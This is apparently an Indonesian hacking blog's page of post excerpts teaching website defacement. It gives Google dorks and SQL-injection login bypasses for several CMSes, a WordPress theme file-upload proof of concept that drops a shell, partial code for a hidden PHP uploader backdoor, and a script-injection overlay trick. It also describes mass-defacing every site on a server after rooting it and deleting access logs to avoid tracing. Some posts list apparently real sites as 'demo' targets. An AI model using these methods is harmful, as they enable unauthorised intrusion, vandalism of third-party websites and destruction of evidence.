Alwdy

Postingan

Menampilkan postingan dengan label Belajar Deface

Mass Deface After Rooting Server

Halo apakabar.. Mau Lanjutin Yang kemaren. Cara Mass Deface Setelah Root. Oke Sebelumnya Kalian Baca dulu Post yang ini Cara Simple Rooting Server Atau Cari di Google Kali ini MnH-Blog Rooting dengan DirtyCow & OS windows. Setelah Berhasil Rooted & Login ke Akun FireFart Upload Script Deface Kalian. Contoh di webtarget Kami memakai file id.htm Selanjutnya Upload lagi Script mass deface . Script Mass Download disini >>> Buka Terminal / Cmd kalian lalu ketikkan chmod +x mass ./mass Setelah Muncul tulisan your index path in the server ketikkan Current Dir WebTarget Kalian & nama File Script deface kalian. /home/studyemirate/public_html/id.htm Enter The Patch to deface ketikkan /home/ Tunggu sampe Done ! Dan Kalian Cek semua Website yang berada 1 sever dengan web target di http://www.yougetsignal.com/tools/web-sites-on-web-server/ Sekian Semoga Bermanfaat...

Baca selengkapnya

PHP Hidden Uploader

Hidden Uploader Buat Kalian nih .. pasti udah pada punya ya?? Kalo belom Langsung Pake dah :D File Uploader ini biasanya dinamai index.php Jadi Tempat masang Uploader nya di directory yang belom ada index.php Contoh : " http: //target.com/promotions/ " Trus Kita Upload Hidden Uploadernya yang tadi dinamai index.php Nanti akan terlihat Blank kek gini Kalo manggil Hidden Uploader nya kita masukan query di url tadi jadi " http: //target.com/promotions/index.php?uploader " Dan Akan terlihat Uploader nya <?php if ( isset ($_GET[ "uploader" ])) { { echo "<font color=#ffffff>" .php_uname(). "" ; print "\n" ;$disable_functions = @ini_get( "disable_functions" ); echo "<br>DisablePHP=" .$disable_functions; print "\n" ; echo "<br><form method=post enctype=multipart/form-data>" ; echo "<input type=file name=f><input name=...

Baca selengkapnya

Admin CMS Biz1m.com [NoRedirect]

Jadi Gw dapet Metode ini dari blog TkjCyberArt Untuk Metode Admin Page Noredirect Bisa Cek Post Gw yang ini Upshot Media Ltd AdminPage bypass [NoRedirect] Dork klik > " intext:Jumlah ahli ahli vip jumlah lawatan" Admin login Page : /admin-cp/ atau /admin-cp/logadmin.php Admin Page : /admin-cp.php Lalu Cek target.com /admin-cp.php Mungkin Nanti CMS ini Kebanyakan tidak ada Uploadernya. Jadi Kalian bisa Pakai Metode JSoverlay Silahkan Cek di Post ini Deface Metode JSOverLay Oke Selamat Mencoba.

Baca selengkapnya

Deface Metode JSOverLay

Metode Deface JSoverlay Kalo Gw buat Bypass Web yang ga bisa di pasangin Backdoor :D Jadi Ga kehabisan Akal ya.. udah susah2 Masuk ke panel admin tapi ga bisa di pasangin Backdoor. Tutorialnya gini. Kalian Harus punya Mirror di Zone-H. Cek mirror kalian lalu Ctrl+u Tekan Ctrl+F ketikan <iframe src= Ambil Link ini. Lalu Ambil Scriptnya disini https://ghostbin.com/paste/x3k4b . Lalu Ganti <iframe src= dengan link yang sudah di ambil dari ZoneH tadi. Dan Simpan Semua Script Tersebut di https://pastebin.com Setelah Tersimpan Langsung Raw. Simpan Link Pastebin Kalian . Lalu Copy pastekan Script Pastebin DISINI Jadi seperti ini. <script type="text/javascript" src="https://pastebin.com/raw/EuRSWead"></script> Setelah itu Di Panel Admin. Coba Kalian Edit Judul Berita / Event. Kalo sukses.. Coba Buka Halaman Depan. Tampilan akan seperti ini. Oke Sampe Ketemu DiTutorial Selanjutnya.

Baca selengkapnya

Cara Aman Saat Melakukan Aksi Deface

Beberapa waktu lalu situs dewanpers.or.id sempat dibobol dan Peretas Situs Tersebut Mengaku Hanya Cari Kepuasan dan Eksistensi. "Ada kepuasan sendiri setelah berhasil membobol suatu situs dan mengubah tampilan home/index" Karena perbuatannya dikenakan Pasal 50 Undang-undang Nomor 36 Tahun 1999 tentang Telekomunikasi dan Pasal 32 Undang-undang Nomor 19 Tahun 2016 tentang Informasi dan Teknologi Informasi. Bagi kalian yang mau menghapus jejak saat melakukan Aksi deface Mungkin ini ada beberapa tips melakukan aksi deface dengan aman. 1. Hapus File Access-log . Caranya buka Akses Shell kalian. Pindah direktori ke direktori root. Biasanya itu nama userweb Setelah Pindah ke directory root (Misal Ga muncul daftar direktorinya, Berarti Ga bisa) Pilih direktori access-log (Atau semacam nya) Buka Dir access-log , Nanti biasanya ada file pake nama domain websitenya sendiri. Hapus file tersebut.. 2. Menggunakan RDP - Proxy atau Vpn Supaya Extra aman Silahkan membeli RDP Ap...

Baca selengkapnya

WordPress Themes U-design File Upload

Dork: inurl:/wp-content/themes/[u/design OR u-design ] Exploit Title : WordPress Themes U-design File Upload Author : Mohammad peywasteh Tested : Win10 ------------------------------------------- Dork: inurl:/wp-content/themes/u-design << Klik >> Google Dork : inurl:/wp-content/themes/[u/design OR u-design ] Exploit : https://localhost/ wp-content/themes/[u/design OR u-design ]/scripts/admin/uploadify/uploadify.php Vulnerability : Exploit Page PoC : <form method="POST" action="https://localhost/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data"> <input type="file" name="Filedata" /> <button>Upload!</button><br/> </form> Klik >> https://ghostbin.com/paste/ov2md File Access : https://localhost/patch/shell.php

Baca selengkapnya

WebNegar CMS 2.1 Admin Bypass

WebNegar CMS 2.1 Admin Bypass Published Credit Risk 2017.05.31 M@rAz Ali Medium CWE CVE Local Remote N/A N/A No Yes Dork: intext:"Powered by WebNegar CMS" ############################################################################ # Exploit title: WebNegar CMS 2.1 Admin Bypass # Date: 2017-05-31 # Tested on: Win7 # Author: M@rAz Ali # Dork : intext:"Powered by WebNegar CMS" ############################################################################ Target : site.com http://site.com/admin Bypass : 'or' '=' < Username,Password Shell Upload > site.com/admin/?type=files&list=files Upload Dir > /files/ ############################################################################

Baca selengkapnya

WTS Technologies Admin Login bypass

Malam Gan.. Gimana Puasanya Lancar kan ??? " Deface nya Lancar , Puasanya Bolong2 :D " Malam ini Ane mau share Tutor Deface Admin Login Bypass WTS Technologies. Simak Yak. Dorks nya : "Powered by WTS Technologies" Admin page nya ada di : www.sitetarget.com/console/ Username & Password : '=' 'OR' Dan Gw langsung Masuk admin panel nya... udah gt tinggal cari Uploader buat upload Backdoor nya. Gw coba Upload disitu.. Oke berhasil... inget ya Ga usah tebas2 index dehh.. Kalo ga di Backup mah :D Sekian sampe Ketemu lagi di Tutorial selanjutnya.. Greetz : - x404.hz - Trenggalek6etar - Lunatic0de - XnonGermx - nginxDEX - Vcry - StuxN3t - Kerens_id - Fx106 - Magelang6etar & All indonesia Defacer

Baca selengkapnya

Upshot Media Ltd AdminPage bypass [NoRedirect]

Selamat malam Penggemar... ☻ Terima Kasih Buat Semua Defacer di tanah air yang udah bantu share ni Blog. Oke sekarang gw bakal share Metode Deface Adminpage Bypass with Noredirect. yang sebelumnya gw juga udah pernah share disini Deface Dengan admin page Desenvolvimento MW Way [No Redirect] Bahan Yang harus di persiapkan , Addons mozilla download DISINI Langsung Search di google.. Dorks : "Website design by Upshot Media Ltd" Buka web : Sitetarget.com/admin/ Setelah itu langsung buka Addons No redirect Lalu Copas Sitetarget.com/admin/ langsung klik OK . Buka lagi Sitetarget.com /admin/home.php Kalo vuln Tanpa Username & Password elo langsung masuk ke panel admin nya.. Tinggal upload Backdoors dah.... Demo : http://www.edwinsinstallations.co.uk/admin/ http://www.blanquette.co.uk/admin/ http://www.plesheyforgeltd.co.uk/admin/ http://www.oaktubs.com/admin/ http://www.eastcoastminiclub.co.uk/admin/ Note : Sayangnya di beberapa Site, Gw liat ga ada...

Baca selengkapnya

Deface dengan Ofek Technologies Admin Page bypass

Halo gaess.... Gw mw Share Tutor Buat yang mau belajar deface. :D Yok langsung Baca tutor nya. Dorks 1 : "Powered by Ofek Technologies" Dorks 2 : "Designed By Ofek Technologies" Home Admin : sitetarget.com/index.php/admin/login.html Masukin username&password Username : '=' 'or' Password : '=' 'or' Okeh langsung cari tempat uploader.. Buat upload Backdoors :D GoodLuck Gaees ! Demo : http://www.globalhotelsforsale.com/ http://www.nairswedding.in/ http://www.geovinsolutions.com/ http://www.sja.org.in http://www.syaa.in http://www.se7en.co.in/ Titip Gans "MagelangNoobsHackers" ..... zueheehe.....

Baca selengkapnya

Alwdy

Cari Blog Ini

Postingan

Pinned Post

Rekomendasi Game Simulator Kendaraan 2020 yang Tak Kalah Seru dari Sebelumnya

Mass Deface After Rooting Server

PHP Hidden Uploader

Admin CMS Biz1m.com [NoRedirect]

Deface Metode JSOverLay

Cara Aman Saat Melakukan Aksi Deface

WordPress Themes U-design File Upload

WebNegar CMS 2.1 Admin Bypass

WTS Technologies Admin Login bypass

Upshot Media Ltd AdminPage bypass [NoRedirect]

Deface dengan Ofek Technologies Admin Page bypass